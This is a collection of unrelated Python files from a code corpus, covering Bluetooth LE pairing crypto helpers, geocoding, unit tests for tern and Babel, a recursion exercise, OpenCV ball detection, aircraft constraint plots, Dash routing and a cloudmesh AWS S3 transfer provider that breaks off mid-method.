from cryptography.hazmat.primitives.asymmetric import ec
import cryptography.hazmat.backends
from Crypto.Hash import CMAC
from Crypto.Cipher import AES
import os
import binascii
def wrapper_contains_type(wrapper: Message, message_type):
if wrapper is None:
return False
field_name = "message_" + message_type.DESCRIPTOR.full_name.replace(".", "_")
return wrapper.HasField(field_name)
def wrapper_get_contents(wrapper: Message, message_type=None):
if message_type is not None:
field_name = "message_" + message_type.DESCRIPTOR.full_name.replace(".", "_")
else:
field_name = wrapper.WhichOneof("message")
return getattr(wrapper, field_name)
def crypto_generate_keypair():
private: ec.EllipticCurvePrivateKeyWithSerialization = ec.generate_private_key(ec.SECP256R1(), cryptography.hazmat.backends.default_backend())
public: ec.EllipticCurvePublicKey = private.public_key()
ser_private = _crypto_private_to_bytes(private)
ser_public = _crypto_public_to_bytes(public)
return ser_private, ser_public
def crypto_get_nonce():
return os.urandom(16)
def crypto_aes_cmac(k: bytes, m: bytes):
cobj = CMAC.new(k, ciphermod=AES)
cobj.update(m)
return cobj.digest()
def crypto_ble_f4(u, v, x, z):
# f4(U, V, X, Z) = AES-CMAC_X (U || V || Z)
m = u + v + z
k = x
return crypto_aes_cmac(k, m)
def crypto_ble_f5(w, n1, n2, a1, a2):
salt = binascii.unhexlify("6C88 8391 AAF5 A538 6037 0BDB 5A60 83BE".replace(" ", ""))
keyid = binascii.unhexlify("62 74 6c 65".replace(" ", ""))
t = crypto_aes_cmac(salt, w)
def get_f5_counter(counter: int):
m = counter.to_bytes(length=1, byteorder='big') + keyid + n1 + n2 + a1 + a2
length = 256 # Why?
m = m + length.to_bytes(length=2, byteorder='big')
return crypto_aes_cmac(t, m)
mackey = get_f5_counter(0)
ltk = get_f5_counter(1)
return mackey, ltk
def crypto_ble_f6(w, *args):
return crypto_aes_cmac(w, b''.join(args))
def _crypto_private_from_bytes(data: bytes) -> ec.EllipticCurvePrivateKey:
return ec.derive_private_key(
private_value=int.from_bytes(bytes=data, byteorder='big'),
curve=ec.SECP256R1(),
backend=cryptography.hazmat.backends.default_backend()
)
def _crypto_public_from_bytes(data: bytes) -> ec.EllipticCurvePublicKey:
return ec.EllipticCurvePublicNumbers.from_encoded_point(
curve=ec.SECP256R1(),
data=data
).public_key(backend=cryptography.hazmat.backends.default_backend())
def _crypto_private_to_bytes(private: ec.EllipticCurvePrivateKeyWithSerialization) -> bytes:
numbers: ec.EllipticCurvePrivateNumbers = private.private_numbers()
v: int = numbers.private_value
return v.to_bytes(length=32, byteorder='big')
def _crypto_public_to_bytes(public: ec.EllipticCurvePublicKey) -> bytes:
numbers: ec.EllipticCurvePublicNumbers = public.public_numbers()
return numbers.encode_point()
def crypto_derive_dhkey(private_bytes: bytes, public_bytes: bytes):
private = _crypto_private_from_bytes(private_bytes)
public = _crypto_public_from_bytes(public_bytes)
shared_key = private.exchange(ec.ECDH(), public)
return shared_key
if __name__ == "__main__":
private_a_raw = binascii.unhexlify(
"3f49f6d4 a3c55f38 74c9b3e3 d2103f50 4aff607b eb40b799 5899b8a6 cd3c1abd".replace(" ", ""))
private_b_raw = binascii.unhexlify(
"55188b3d 32f6bb9a 900afcfb eed4e72a 59cb9ac2 f19d7cfb 6b4fdd49 f47fc5fd".replace(" ", ""))
private_b = _crypto_private_from_bytes(private_b_raw)
public_b_raw = _crypto_public_to_bytes(private_b.public_key())
print(crypto_derive_dhkey(private_a_raw, public_b_raw))
| StarcoderdataPython |
145285 | from typing import Tuple
import googlemaps
from model.exception import UnexpectedNumberOfLocationsForAddressError
from paths import GOOGLE_CLOUD_PLATFORMS_API_KEY_FILE
class AddressLocator(object):
def __init__(self):
with open(GOOGLE_CLOUD_PLATFORMS_API_KEY_FILE, encoding='utf8', mode='r') as api_key_file:
api_key= api_key_file.read().strip()
self.gmaps_client: googlemaps.Client = googlemaps.Client(key=api_key)
def get_coordinates(self, street: str, zip: str, country: str) -> Tuple[float, float]:
''' Returns coordinates as (latitude, longitude) '''
address = street + ', ' + zip + ', ' + country
api_response = self.gmaps_client.geocode(address)
if not len(api_response) == 1:
raise UnexpectedNumberOfLocationsForAddressError(len(api_response), address)
location = api_response[0]['geometry']['location']
return location['lat'], location['lng']
| StarcoderdataPython |
3344397 | <reponame>asifjoardar/tern
import unittest
from tern.utils import general
class TestUtilGeneral(unittest.TestCase):
def testImageString(self):
correct_strings = [
'image@digest_type:digest',
'image:tag',
'debian:buster',
'golang:1.12-alpine',
('p12/test@sha256:737aaa0caf3b8f64baa41ebf78c6cd0c43f34fadccc1275'
'a32b8ab5d5b75c344')
]
incorrect_strings = [
'debian',
'image',
'debian@sha',
'test/v1.56'
]
for image_str in correct_strings:
self.assertTrue(general.check_image_string(image_str))
for image_str in incorrect_strings:
self.assertFalse(general.check_image_string(image_str))
def testParseImageString(self):
hello = 'hello-world'
debian = 'debian:9.8-slim'
distroless = 'gcr.io/distroless/static'
resizer = 'gcr.io/google-containers/addon-resizer:2.3'
etcd = ('bitnami/etcd@sha256:35862e29b27efd97cdf4a1fc79abc1341feac556'
'32e4256b02e6cfee9a4b6455')
self.assertEqual(general.parse_image_string(hello),
{'name': 'hello-world',
'tag': '',
'digest_type': '',
'digest': ''})
self.assertEqual(general.parse_image_string(debian),
{'name': 'debian',
'tag': '9.8-slim',
'digest_type': '',
'digest': ''})
self.assertEqual(general.parse_image_string(distroless),
{'name': 'gcr.io/distroless/static',
'tag': '',
'digest_type': '',
'digest': ''})
self.assertEqual(general.parse_image_string(resizer),
{'name': 'gcr.io/google-containers/addon-resizer',
'tag': '2.3',
'digest_type': '',
'digest': ''})
self.assertEqual(general.parse_image_string(etcd),
{'name': 'bitnami/etcd',
'tag': '',
'digest_type': 'sha256',
'digest': ('35862e29b27efd97cdf4a1fc79abc1341fe'
'ac55632e4256b02e6cfee9a4b6455')})
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
100740 | # lec5prob9-semordnilap.py
# edX MITx 6.00.1x
# Introduction to Computer Science and Programming Using Python
# Lecture 5, problem 9
# A semordnilap is a word or a phrase that spells a different word when backwards
# ("semordnilap" is a semordnilap of "palindromes"). Here are some examples:
#
# nametag / gateman
# dog / god
# live / evil
# desserts / stressed
#
# Write a recursive program, semordnilap, that takes in two words and says if
# they are semordnilap.
def semordnilap(str1, str2):
'''
str1: a string
str2: a string
returns: True if str1 and str2 are semordnilap;
False otherwise.
'''
# Your code here
# Check to see if both strings are empty
if not (len(str1) or len(str2)): return True
# Check to see if only one string is empty
if not (len(str1) and len(str2)): return False
# Check to see if first char of str1 = last of str2
# If not, no further comparison needed, return False
if str1[0] != str2[-1]: return False
return semordnilap(str1[1:], str2[:-1])
# Performing a semordnilap comparison using slicing notation,
# but this is not valid for this assigment
# elif str1 == str2[::-1]:
# return True
# Example of calling semordnilap()
theResult = semordnilap('may', 'yam')
print (str(theResult))
| StarcoderdataPython |
3335437 | <reponame>cpostbitbuckets/BucketVision
import cv2
import time
im = cv2.imread('balls.jpg')
w = 640.0
r = w / im.shape[1]
dim = (int(w), int(im.shape[0] * r))
im = cv2.resize(im, dim, interpolation = cv2.INTER_AREA)
start = time.time()
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
hue = [0.0, 61.74061433447099]
sat = [73.38129496402877, 255.0]
val = [215.55755395683454, 255.0]
thresh3 = cv2.inRange(hsv, (hue[0], sat[0], val[0]), (hue[1], sat[1], val[1]))
th, bw = cv2.threshold(hsv[:, :, 2], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
bw = thresh3
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))
morph = cv2.morphologyEx(bw, cv2.MORPH_CLOSE, kernel)
dist = cv2.distanceTransform(morph, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)
borderSize = 25 #75
distborder = cv2.copyMakeBorder(dist, borderSize, borderSize, borderSize, borderSize,
cv2.BORDER_CONSTANT | cv2.BORDER_ISOLATED, 0)
gap = 10
kernel2 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2*(borderSize-gap)+1, 2*(borderSize-gap)+1))
kernel2 = cv2.copyMakeBorder(kernel2, gap, gap, gap, gap,
cv2.BORDER_CONSTANT | cv2.BORDER_ISOLATED, 0)
distTempl = cv2.distanceTransform(kernel2, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)
nxcor = cv2.matchTemplate(distborder, distTempl, cv2.TM_CCOEFF_NORMED)
mn, mx, _, _ = cv2.minMaxLoc(nxcor)
th, peaks = cv2.threshold(nxcor, mx*0.5, 255, cv2.THRESH_BINARY)
peaks8u = cv2.convertScaleAbs(peaks)
_, contours, hierarchy = cv2.findContours(peaks8u, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)
peaks8u = cv2.convertScaleAbs(peaks) # to use as mask
for i in range(len(contours)):
area = cv2.contourArea(contours[i])
if 12 < area:
x, y, w, h = cv2.boundingRect(contours[i])
_, mx, _, mxloc = cv2.minMaxLoc(dist[y:y+h, x:x+w], peaks8u[y:y+h, x:x+w])
cv2.circle(im, (int(mxloc[0]+x), int(mxloc[1]+y)), int(mx), (255, 0, 0), 2)
cv2.rectangle(im, (x, y), (x+w, y+h), (0, 255, 0), 2)
cv2.drawContours(im, contours, i, (0, 0, 255), 2)
print("Duration = ",time.time() - start)
cv2.imshow('Balls', im)
cv2.waitKey(0)
| StarcoderdataPython |
16569 | <filename>CORE/engines/Gudmundsson_Constraint.py
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
##################################################################################
# File: c:\Projects\KENYA ONE PROJECT\CORE\engines\Gudmundsson_Constraint.py #
# Project: c:\Projects\KENYA ONE PROJECT\CORE\engines #
# Created Date: Thursday, January 9th 2020, 8:56:55 pm #
# Author: <NAME> ( <<EMAIL>> ) #
# ----- #
# Last Modified: Thursday January 9th 2020 8:56:55 pm #
# Modified By: <NAME> ( <<EMAIL>> ) #
# ----- #
# MIT License #
# #
# Copyright (c) 2020 KENYA ONE PROJECT #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of#
# this software and associated documentation files (the "Software"), to deal in #
# the Software without restriction, including without limitation the rights to #
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies #
# of the Software, and to permit persons to whom the Software is furnished to do #
# so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# ----- #
# Copyright (c) 2020 KENYA ONE PROJECT #
##################################################################################
import sys
sys.path.append("../")
from CORE.API.db_API import write_to_db, read_from_db # type: ignore
from math import sqrt, pi
import numpy as np # type: ignore
import matplotlib.pyplot as plt # type: ignore
grossWeight = read_from_db("finalMTOW")
cruiseSpeed = read_from_db("cruiseSpeed")
ROC = read_from_db("rateOfClimb") * 3.28 * 60
vLof = read_from_db("stallSpeed") * 1.1
AR = read_from_db("AR")
cdMin = read_from_db("cdMin")
wsfromsizing = read_from_db("WS")
rhoSL = read_from_db("rhoSL")
propEff = read_from_db("propEff")
cruiseAltitude: int = 10000 # ft
gForce: float = 2.0
V_ROC: float = 80.0
groundRun: int = 900
serviceCeiling: int = 18000
wsInitial: float = 22.6 # lb/f**2
g: float = 32.174
CDto: float = 0.04
CLto: float = 0.5
groundFriction: float = 0.04
def oswaldEff(AR: float) -> float:
e = (1.78 * (1 - (0.045 * AR ** 0.68))) - 0.64
return e
e = oswaldEff(AR)
k: float = 1 / (pi * AR * e)
write_to_db("k", k)
# dynamic pressure at altitude
def rhoAlt(cruiseAltitude: int) -> float:
rhoalt = rhoSL * (1 - 0.0000068756 * cruiseAltitude) ** 4.2561
return rhoalt
rhoCruise = rhoAlt(cruiseAltitude)
# print ('air density at cruise altitude, rho = ' +str(rhoCruise))
qAltitude = 0.5 * rhoCruise * (1.688 * cruiseSpeed) ** 2
# print('dynamic pressure at altitude = ' +str(qAltitude))
# Gag Ferrar Model
def gagFerrar(bhp):
"takes in bhp and returns normalised bhp"
normBhp = bhp / (1.132 * (rhoCruise / rhoSL) - 0.132)
return normBhp
WS = np.arange(10, 30)
twTurn = qAltitude * ((cdMin / WS) + k * (gForce / qAltitude) ** 2 * (WS))
qROC = 0.5 * rhoSL * (V_ROC * 1.688) ** 2
Vv = ROC / 60
twROC = (Vv / (V_ROC * 1.688)) + (qROC * cdMin / WS) + (k * WS / qROC)
qVlof = 0.5 * rhoSL * (vLof * 1.688 / sqrt(2)) ** 2
twVlof = (
((vLof * 1.688) ** 2 / (2 * g * groundRun))
+ (qVlof * CDto / WS)
+ (groundFriction * (1 - (qVlof * CLto / WS)))
)
rhoCeiling = rhoAlt(serviceCeiling)
# print(rhoCeiling)
twCruise = qAltitude * cdMin * (1 / WS) + (k)
twCeiling = (1.667 / (np.sqrt((2 * WS / rhoCeiling) * sqrt(k / 3 * cdMin)))) + (
(k * cdMin / 3) * 4
)
plt.figure(1)
plt.subplot(121)
plt.plot(WS, twTurn, label="Rate of Turn")
plt.plot(WS, twROC, label="Rate of Climb")
plt.plot(WS, twVlof, label="Vlof")
plt.plot(WS, twCruise, label="Cruise")
plt.plot(WS, twCeiling, label="Ceiling")
plt.axvline(x=wsfromsizing)
plt.title(" Graph 1 \n HP/Weight ratio")
plt.legend()
# ax = plt.gca()
# ax.set_xticklabels([])
###NORMAlization
norm_twTurn = gagFerrar((grossWeight * twTurn * 1.688 * cruiseSpeed / (propEff * 550)))
test = grossWeight * twTurn * 1.688 * cruiseSpeed / (propEff * 550)
norm_twROC = gagFerrar((grossWeight * twROC * 1.688 * V_ROC / (propEff * 550)))
norm_twVlof = gagFerrar((grossWeight * twVlof * 1.688 * vLof / (propEff * 550)))
norm_twCruise = gagFerrar(
(grossWeight * twCruise * 1.688 * cruiseSpeed / (propEff * 550))
)
norm_twCeiling = gagFerrar(
(grossWeight * twCeiling * 1.688 * cruiseSpeed / (propEff * 550))
)
plt.subplot(122)
plt.plot(WS, norm_twTurn, label="Rate of Turn")
plt.plot(WS, norm_twROC, label="Rate of Climb")
plt.plot(WS, norm_twVlof, label="Vlof")
plt.plot(WS, norm_twCruise, label="Cruise")
plt.plot(WS, norm_twCeiling, label="Ceiling")
plt.title("Graph 2 \n Normalised BHP")
plt.legend()
plt.axvline(x=wsfromsizing)
plt.tight_layout()
if __name__ == "__main__":
plt.show()
def find_nearest(array, value: float) -> int:
idx = (np.abs(array - value)).argmin()
return idx
# print(find_nearest(ws, plotWS))
plotWS = read_from_db("WS")
myidx = find_nearest(WS, plotWS)
def point() -> float:
cruiseidx = norm_twCruise[myidx]
takeoffidx = norm_twVlof[myidx]
climbidx = norm_twROC[myidx]
turnidx = norm_twTurn[myidx]
ceilingidx = norm_twCeiling[myidx]
# print([cruiseidx,takeoffidx,climbidx,turnidx,ceilingidx])
# print (cruiseidx,"cruiseidx")
x = np.array([cruiseidx, takeoffidx, climbidx, turnidx, ceilingidx])
return x[np.argmax(x)]
finalBHP = point()
write_to_db("finalBHP", finalBHP)
print(finalBHP, "The Final normalised BHP")
# now switch back to figure 1 and make some changes
| StarcoderdataPython |
3354839 | <gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2011 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
import inspect
import os
import shutil
import tempfile
import unittest
import pytest
from datetime import date, datetime, timedelta
from babel import support
from babel.messages import Catalog
from babel.messages.mofile import write_mo
from babel._compat import BytesIO
@pytest.mark.usefixtures("os_environ")
class TranslationsTestCase(unittest.TestCase):
def setUp(self):
# Use a locale which won't fail to run the tests
os.environ['LANG'] = 'en_US.UTF-8'
messages1 = [
('foo', {'string': 'Voh'}),
('foo', {'string': 'VohCTX', 'context': 'foo'}),
(('foo1', 'foos1'), {'string': ('Voh1', 'Vohs1')}),
(('foo1', 'foos1'), {'string': ('VohCTX1', 'VohsCTX1'), 'context': 'foo'}),
]
messages2 = [
('foo', {'string': 'VohD'}),
('foo', {'string': 'VohCTXD', 'context': 'foo'}),
(('foo1', 'foos1'), {'string': ('VohD1', 'VohsD1')}),
(('foo1', 'foos1'), {'string': ('VohCTXD1', 'VohsCTXD1'), 'context': 'foo'}),
]
catalog1 = Catalog(locale='en_GB', domain='messages')
catalog2 = Catalog(locale='en_GB', domain='messages1')
for ids, kwargs in messages1:
catalog1.add(ids, **kwargs)
for ids, kwargs in messages2:
catalog2.add(ids, **kwargs)
catalog1_fp = BytesIO()
catalog2_fp = BytesIO()
write_mo(catalog1_fp, catalog1)
catalog1_fp.seek(0)
write_mo(catalog2_fp, catalog2)
catalog2_fp.seek(0)
translations1 = support.Translations(catalog1_fp)
translations2 = support.Translations(catalog2_fp, domain='messages1')
self.translations = translations1.add(translations2, merge=False)
def assertEqualTypeToo(self, expected, result):
self.assertEqual(expected, result)
assert type(expected) == type(result), "instance type's do not " + \
"match: %r!=%r" % (type(expected), type(result))
def test_pgettext(self):
self.assertEqualTypeToo('Voh', self.translations.gettext('foo'))
self.assertEqualTypeToo('VohCTX', self.translations.pgettext('foo',
'foo'))
def test_upgettext(self):
self.assertEqualTypeToo(u'Voh', self.translations.ugettext('foo'))
self.assertEqualTypeToo(u'VohCTX', self.translations.upgettext('foo',
'foo'))
def test_lpgettext(self):
self.assertEqualTypeToo(b'Voh', self.translations.lgettext('foo'))
self.assertEqualTypeToo(b'VohCTX', self.translations.lpgettext('foo',
'foo'))
def test_npgettext(self):
self.assertEqualTypeToo('Voh1',
self.translations.ngettext('foo1', 'foos1', 1))
self.assertEqualTypeToo('Vohs1',
self.translations.ngettext('foo1', 'foos1', 2))
self.assertEqualTypeToo('VohCTX1',
self.translations.npgettext('foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo('VohsCTX1',
self.translations.npgettext('foo', 'foo1',
'foos1', 2))
def test_unpgettext(self):
self.assertEqualTypeToo(u'Voh1',
self.translations.ungettext('foo1', 'foos1', 1))
self.assertEqualTypeToo(u'Vohs1',
self.translations.ungettext('foo1', 'foos1', 2))
self.assertEqualTypeToo(u'VohCTX1',
self.translations.unpgettext('foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo(u'VohsCTX1',
self.translations.unpgettext('foo', 'foo1',
'foos1', 2))
def test_lnpgettext(self):
self.assertEqualTypeToo(b'Voh1',
self.translations.lngettext('foo1', 'foos1', 1))
self.assertEqualTypeToo(b'Vohs1',
self.translations.lngettext('foo1', 'foos1', 2))
self.assertEqualTypeToo(b'VohCTX1',
self.translations.lnpgettext('foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo(b'VohsCTX1',
self.translations.lnpgettext('foo', 'foo1',
'foos1', 2))
def test_dpgettext(self):
self.assertEqualTypeToo(
'VohD', self.translations.dgettext('messages1', 'foo'))
self.assertEqualTypeToo(
'VohCTXD', self.translations.dpgettext('messages1', 'foo', 'foo'))
def test_dupgettext(self):
self.assertEqualTypeToo(
u'VohD', self.translations.dugettext('messages1', 'foo'))
self.assertEqualTypeToo(
u'VohCTXD', self.translations.dupgettext('messages1', 'foo', 'foo'))
def test_ldpgettext(self):
self.assertEqualTypeToo(
b'VohD', self.translations.ldgettext('messages1', 'foo'))
self.assertEqualTypeToo(
b'VohCTXD', self.translations.ldpgettext('messages1', 'foo', 'foo'))
def test_dnpgettext(self):
self.assertEqualTypeToo(
'VohD1', self.translations.dngettext('messages1', 'foo1', 'foos1', 1))
self.assertEqualTypeToo(
'VohsD1', self.translations.dngettext('messages1', 'foo1', 'foos1', 2))
self.assertEqualTypeToo(
'VohCTXD1', self.translations.dnpgettext('messages1', 'foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo(
'VohsCTXD1', self.translations.dnpgettext('messages1', 'foo', 'foo1',
'foos1', 2))
def test_dunpgettext(self):
self.assertEqualTypeToo(
u'VohD1', self.translations.dungettext('messages1', 'foo1', 'foos1', 1))
self.assertEqualTypeToo(
u'VohsD1', self.translations.dungettext('messages1', 'foo1', 'foos1', 2))
self.assertEqualTypeToo(
u'VohCTXD1', self.translations.dunpgettext('messages1', 'foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo(
u'VohsCTXD1', self.translations.dunpgettext('messages1', 'foo', 'foo1',
'foos1', 2))
def test_ldnpgettext(self):
self.assertEqualTypeToo(
b'VohD1', self.translations.ldngettext('messages1', 'foo1', 'foos1', 1))
self.assertEqualTypeToo(
b'VohsD1', self.translations.ldngettext('messages1', 'foo1', 'foos1', 2))
self.assertEqualTypeToo(
b'VohCTXD1', self.translations.ldnpgettext('messages1', 'foo', 'foo1',
'foos1', 1))
self.assertEqualTypeToo(
b'VohsCTXD1', self.translations.ldnpgettext('messages1', 'foo', 'foo1',
'foos1', 2))
def test_load(self):
tempdir = tempfile.mkdtemp()
try:
messages_dir = os.path.join(tempdir, 'fr', 'LC_MESSAGES')
os.makedirs(messages_dir)
catalog = Catalog(locale='fr', domain='messages')
catalog.add('foo', 'bar')
with open(os.path.join(messages_dir, 'messages.mo'), 'wb') as f:
write_mo(f, catalog)
translations = support.Translations.load(tempdir, locales=('fr',), domain='messages')
self.assertEqual('bar', translations.gettext('foo'))
finally:
shutil.rmtree(tempdir)
class NullTranslationsTestCase(unittest.TestCase):
def setUp(self):
fp = BytesIO()
write_mo(fp, Catalog(locale='de'))
fp.seek(0)
self.translations = support.Translations(fp=fp)
self.null_translations = support.NullTranslations(fp=fp)
def method_names(self):
return [name for name in dir(self.translations) if 'gettext' in name]
def test_same_methods(self):
for name in self.method_names():
if not hasattr(self.null_translations, name):
self.fail('NullTranslations does not provide method %r' % name)
def test_method_signature_compatibility(self):
for name in self.method_names():
translations_method = getattr(self.translations, name)
null_method = getattr(self.null_translations, name)
signature = inspect.getargspec
self.assertEqual(signature(translations_method),
signature(null_method))
def test_same_return_values(self):
data = {
'message': u'foo', 'domain': u'domain', 'context': 'tests',
'singular': u'bar', 'plural': u'baz', 'num': 1,
'msgid1': u'bar', 'msgid2': u'baz', 'n': 1,
}
for name in self.method_names():
method = getattr(self.translations, name)
null_method = getattr(self.null_translations, name)
signature = inspect.getargspec(method)
parameter_names = [name for name in signature[0] if name != 'self']
values = [data[name] for name in parameter_names]
self.assertEqual(method(*values), null_method(*values))
class LazyProxyTestCase(unittest.TestCase):
def test_proxy_caches_result_of_function_call(self):
self.counter = 0
def add_one():
self.counter += 1
return self.counter
proxy = support.LazyProxy(add_one)
self.assertEqual(1, proxy.value)
self.assertEqual(1, proxy.value)
def test_can_disable_proxy_cache(self):
self.counter = 0
def add_one():
self.counter += 1
return self.counter
proxy = support.LazyProxy(add_one, enable_cache=False)
self.assertEqual(1, proxy.value)
self.assertEqual(2, proxy.value)
def test_can_copy_proxy(self):
from copy import copy
numbers = [1,2]
def first(xs):
return xs[0]
proxy = support.LazyProxy(first, numbers)
proxy_copy = copy(proxy)
numbers.pop(0)
self.assertEqual(2, proxy.value)
self.assertEqual(2, proxy_copy.value)
def test_can_deepcopy_proxy(self):
from copy import deepcopy
numbers = [1,2]
def first(xs):
return xs[0]
proxy = support.LazyProxy(first, numbers)
proxy_deepcopy = deepcopy(proxy)
numbers.pop(0)
self.assertEqual(2, proxy.value)
self.assertEqual(1, proxy_deepcopy.value)
def test_format_date():
fmt = support.Format('en_US')
assert fmt.date(date(2007, 4, 1)) == 'Apr 1, 2007'
def test_format_datetime():
from pytz import timezone
fmt = support.Format('en_US', tzinfo=timezone('US/Eastern'))
when = datetime(2007, 4, 1, 15, 30)
assert fmt.datetime(when) == 'Apr 1, 2007, 11:30:00 AM'
def test_format_time():
from pytz import timezone
fmt = support.Format('en_US', tzinfo=timezone('US/Eastern'))
assert fmt.time(datetime(2007, 4, 1, 15, 30)) == '11:30:00 AM'
def test_format_timedelta():
fmt = support.Format('en_US')
assert fmt.timedelta(timedelta(weeks=11)) == '3 months'
def test_format_number():
fmt = support.Format('en_US')
assert fmt.number(1099) == '1,099'
def test_format_decimal():
fmt = support.Format('en_US')
assert fmt.decimal(1.2345) == '1.234'
def test_format_percent():
fmt = support.Format('en_US')
assert fmt.percent(0.34) == '34%'
def test_lazy_proxy():
def greeting(name='world'):
return u'Hello, %s!' % name
lazy_greeting = support.LazyProxy(greeting, name='Joe')
assert str(lazy_greeting) == u"Hello, Joe!"
assert u' ' + lazy_greeting == u' Hello, Joe!'
assert u'(%s)' % lazy_greeting == u'(Hello, Joe!)'
greetings = [
support.LazyProxy(greeting, 'world'),
support.LazyProxy(greeting, 'Joe'),
support.LazyProxy(greeting, 'universe'),
]
greetings.sort()
assert [str(g) for g in greetings] == [
u"Hello, Joe!",
u"Hello, universe!",
u"Hello, world!",
]
| StarcoderdataPython |
179318 | from dash.dependencies import Input, Output, State
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
# main dash instance
from app import app
# call modules needed for callbacks
from apps.pages import map, photos, eda, map_overlay, model_results, progressbar, team18
# Entire callbacks definition
def register_callbacks(app):
@app.callback(Output("page-content", "children"), [Input("url", "pathname")])
def render_page_content(pathname):
if pathname in ["/"]:
return map.layout
elif pathname == "/photos":
return photos.layout
elif pathname == "/eda":
return eda.layout
elif pathname == "/results":
return map_overlay.layout
elif pathname == "/team18":
return team18.layout
# If the user tries to reach a different page, return a 404 message
return dbc.Jumbotron(
[
html.H1("404: Not found", className="text-danger"),
html.Hr(),
html.P(f"The pathname {pathname} was not recognised..."),
]
)
| StarcoderdataPython |
1648632 | <filename>cloudmesh/transfer/provider/awss3/Provider.py
from cloudmesh.storage.StorageNewABC import StorageABC
from cloudmesh.common.debug import VERBOSE
from cloudmesh.common.StopWatch import StopWatch
from cloudmesh.common.util import banner
from cloudmesh.common.console import Console
from cloudmesh.configuration.Config import Config
# from cloudmesh.storage.provider.local.Provider import Provider as \
# StorageLocalProvider
from cloudmesh.storage.provider.azureblob.Provider import Provider as \
StorageAzureblobProvider
from cloudmesh.storage.provider.awss3.Provider import Provider as \
StorageAwss3Provider
from pathlib import Path
from pprint import pprint
from cloudmesh.common.Printer import Printer
class Provider(StorageABC):
"""
Provider class for aws s3 storage.
This class allows transfer of objects from and to AWS S3 bucket
Default parameters are read from ~/.cloudmesh/cloudmesh.yaml :
awss3:
cm:
active: false
heading: homedir
host: aws.com
label: home-dir
kind: awss3
version: TBD
service: storage
default:
directory: /
credentials:
access_key_id: XXX
secret_access_key: XXX
bucket: XXX
region: us-east-2
"""
def __init__(self, source=None, source_obj=None, target=None,
target_obj=None, config="~/.cloudmesh/cloudmesh.yaml"):
banner(f"""In AWS S3 provider
source csp = {source}, source object = {source_obj}
target csp = {target}, target object = {target_obj}""")
# This is a provider for AWS S3 hence initializing storage's AWS S3
# provider by default
self.storage_provider = StorageAwss3Provider(service='awss3')
@staticmethod
def print_table(result, status=None, source=None, target=None):
op_result = []
for idx, i in enumerate(result):
op_dict = dict()
op_dict['idx'] = idx + 1
op_dict['source'] = source
op_dict['name'] = i['fileName']
op_dict['size'] = i['contentLength']
op_dict['lastmodified'] = i['lastModificationDate']
op_dict['type'] = 'File'
op_dict['status'] = status
op_dict['target'] = target
op_result.append(op_dict)
# pprint(op_result)
table = Printer.flatwrite(op_result,
sort_keys=["idx"],
order=["idx", "source", "target", "name",
"size", "type", "lastmodified",
"status"],
header=["S.No.", "Source CSP",
"Target CSP", "Name", "Size",
"Type", "Creation", "Status"])
print(table)
return op_result
def list(self, source=None, source_obj=None,
target=None, target_obj=None,
recursive=True):
"""
To enlist content of "target object"
:param source: source CSP - awss3/azure/local, None for list method
:param source_obj: It can be file or folder, None for list method
:param target: target CSP - awss3/azure/local
:param target_obj: It can be file or folder
:param recursive: enlist directories/sub-directories
:return: dictionary enlisting objects
"""
print("CALLING AWS S3 PROVIDER'S LIST METHOD")
result = self.storage_provider.list(source=target_obj, recursive=True)
# pprint(result)
return self.print_table(result, status='Available', source=source,
target=target)
def delete(self, source=None, source_obj=None,
target=None, target_obj=None,
recursive=True):
"""
To delete content of "target object"
:param source: source CSP - awss3/azure/local, None for delete method
:param source_obj: It can be file or folder, None for delete method
:param target: target CSP - awss3/azure/local
:param target_obj: It can be file or folder
:param recursive: enlist directories/sub-directories
:return: dictionary enlisting deleted objects
"""
print("CALLING AWS S3 PROVIDER'S DELETE METHOD")
result = self.storage_provider.delete(source=target_obj, recursive=True)
if len(result) == 0:
return Console.error(f"Object {target_obj} couldn't be delete from "
f"{target} CSP. Please check.")
else:
Console.ok(f"Deleted following objects from {target} CSP:\n ")
return self.print_table(result, status='Deleted', source=source,
target=target)
def copy(self, source=None, source_obj=None,
target=None, target_obj=None,
recursive=True):
"""
Copy objects from source to target storage
:param source: source CSP - awss3/azure/local
:param source_obj: It can be file or folder
:param target: target CSP - awss3/azure/local
:param target_obj: It can be file or folder
:param recursive: enlist directories/sub-directories
:return: dictionary enlisting copied objects
"""
print("CALLING AWS S3 PROVIDER'S GET METHOD FOR AWS S3 TO LOCAL COPY")
if target_obj is None:
target_obj = source_obj
target_obj = target_obj.replace("\\", "/")
source_obj = source_obj.replace("\\", "/")
if target == "local":
